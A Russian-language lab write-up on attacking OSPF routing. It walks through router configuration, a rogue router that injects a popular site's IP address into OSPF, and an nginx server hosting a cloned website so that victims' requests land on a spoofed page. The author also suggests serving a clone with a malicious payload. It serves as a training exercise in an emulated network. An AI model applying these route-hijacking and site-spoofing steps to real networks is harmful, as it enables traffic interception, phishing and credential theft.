###### tags: `Attack` # **Атаки на протокол динамической маршрутизации** ![](https://i.imgur.com/3xaDgFq.png) Задача - настроить перенаправление трафика на вредоносную машину ![](https://i.imgur.com/s8g2I0r.png) ![](https://i.imgur.com/uT8IGHh.png) Сегмент с атакующей машиной 1. Настраиваем интернет на C-R4: > C-R4#int e0/1 #настраиваем интерфейс, выдаем адрес и маску > C-R4#ip address 11.0.5.4 255.255.255.0 > C-R4#ip nat inside # адрес будет преобразовываться на интерфейс для получения интернета > C-R4#no sh #включаем интерфейс > Аналогичным образом настраиваем оставшиеся e0/2, e0/0 > C-R4#int e0/2 > C-R4#ip address 11.0.8.4 255.255.255.0 > C-R4#ip nat inside > C-R4#no sh > C-R4#int e0/0 > C-R4#ip address 11.0.6.4 255.255.255.0 > C-R4#ip nat inside > C-R4#no sh > C-R4#int e0/3 > C-R4#ip address dhcp > C-R4#ip nat outside #настраиваем преобразование адресов для выхода в интернет Настраиваем OSPF-маршрутизацию: > C-R4#router ospf 1 > C-R4#redistribute connected subnets > C-R4#redistribute static subnets > C-R4#network 11.0.5.0 0.0.0.255 area 0 > C-R4#network 11.0.6.0 0.0.0.255 area 0 > C-R4#network 11.0.8.0 0.0.0.255 area 0 > C-R4#default-information originate always metric 1 #указываем всем роутерам что у C-R4 есть выход в интернет > C-R4#do wr #сохраняем 2. Настраиваем интерфейсы на C-R5: > C-R5#interface Ethernet0/0 > C-R5#int e0/1 > C-R5#ip address 11.0.2.5 255.255.255.0 > C-R5#no sh > C-R5#int e0/2 > C-R5#ip address 11.0.8.5 255.255.255.0 > C-R5#no sh > C-R5#int e0/0 > C-R5#ip address 11.0.7.5 255.255.255.0 > C-R5#no sh Настраиваем OSPF-маршрутизацию: > C-R5(config)#router ospf 1 > C-R5(config)#redistribute connected subnets > C-R5(config)#redistribute static subnets > C-R5(config)#network 11.0.2.0 0.0.0.255 area 0 > C-R5(config)#network 11.0.7.0 0.0.0.255 area 0 > C-R5(config)#network 11.0.8.0 0.0.0.255 area 0 > C-R5(config)#do wr #сохраняем > C-R4(config)#no ip domain-lookup #чтобы обращался сразу к ip, не запрашивая DNS > ###можно одновременнно сделать команды на интерфейсах e0/0-2 : int range e0/0-2 Для NAT прописываем access-list на C-R4: > C-R4(config)#access-list 1 permit any #все разрешаем > C-R4(config)#ip nat inside source list 1 interface ethernet 0/3 #вешаем на интерфейс 3. Настраиваем C-R10: > C-R10(config)#router ospf 1 > C-R10(config)#redistribute connected subnets > C-R10(config)#redistribute static subnets > C-R10(config)#network 11.0.1.0 255.255.255.0 area 0 > C-R10(config)#network 11.0.2.0 255.255.255.0 area 0 > C-R10(config)#network 11.0.3.0 255.255.255.0 area 0 > C-R10(config)#network 11.0.9.0 255.255.255.0 area 0 > C-R10(config)#do wr #сохраняем Также как и на роутере C-R4 приводим интерфейсы C-R10 к виду: > interface Ethernet0/0 > ip address 13.2.0.10 255.255.255.0 > > interface Ethernet0/1 > ip address 11.0.1.10 255.255.255.0 > > interface Ethernet0/2 > ip address 11.0.3.10 255.255.255.0 > > interface Ethernet0/3 > ip address 11.0.2.10 255.255.255.0 > > interface Ethernet1/0 > ip address 11.0.9.10 255.255.255.0 Проверяем какие есть маршруты командой **sh ip ro** 4. Настраиваем Fake-Router: > прервать traceroute - **ctrl+shift+6** > перевести интерфейс в full duplex - **du fu** Попробуем подменить сайт ok.ru, пингуем его, получаем адрес: ![](https://i.imgur.com/HvxuQE1.png) Интерфейсы должны быть настроены таким образом: > interface Ethernet0/0 > ip address 11.0.9.20 255.255.255.0 > > interface Ethernet0/1 > ip address 217.20.155.13 255.255.255.0 secondary #подставляем адрес ok.ru > ip address 8.8.8.20 255.255.255.0 Таким же образом настраиваем ospf: > router ospf 1 > redistribute connected subnets > network 11.0.9.0 0.0.0.255 area 0 Далее, назначаем 217.20.155.13, 8.8.8.20 на Linux роутере в фейковом сегменте сети: > nano /etc/network/interfaces ![](https://i.imgur.com/dAnF1Sw.png) > service networking restart #перезагружаем сеть К примеру, делаем трассировку маршрута до 8.8.8.8 с C-R1 и видим, что трассировка ведет к нашему фейковому адресу: ![](https://i.imgur.com/SDSZess.png) Далее, скачаем утилиту для выгрузки полной версии какого-либо сайта, который потом вставим. Редактируем на фейковой linux-машине файл resolv.conf > nano /etc/resolv.conf > nameserver 1.1.1.1 # для доступа к сети > Обновляем - **apt update** > Ставим nginx - **apt install nginx** > Копируем сайт целиком в папку /var/www - **wget -r -k -l 7 -p -E -nc https://www.fstec.ru/** Прописываем в сервере nginx > nano /etc/nginx/sites-enabled/default > root /var/www/www.fstec.ru > service nginx restart **Для примера я вместо сайта ok.ru, выкачал сайт fstec.ru, можно скачать сайт ok.ru либо любой другой с вредоносной нагрузкой.** Настраиваем kali-linux >nano /etc/resolv.conf >nameserver 1.1.1.1 ![](https://i.imgur.com/gul6sda.png) ![](https://i.imgur.com/DjNWLj5.png) C-R6 int e0/3 ip address 12.0.20.6 255.255.255.0 ![](https://i.imgur.com/VxwqWIJ.png) Перенаправление ведет к вредоносной машине > Что мы видим: при обращении на ok.ru с kali-linux у нас открывается выгруженная страничка сайта fstec.ru ![](https://i.imgur.com/sXYk5ig.jpg)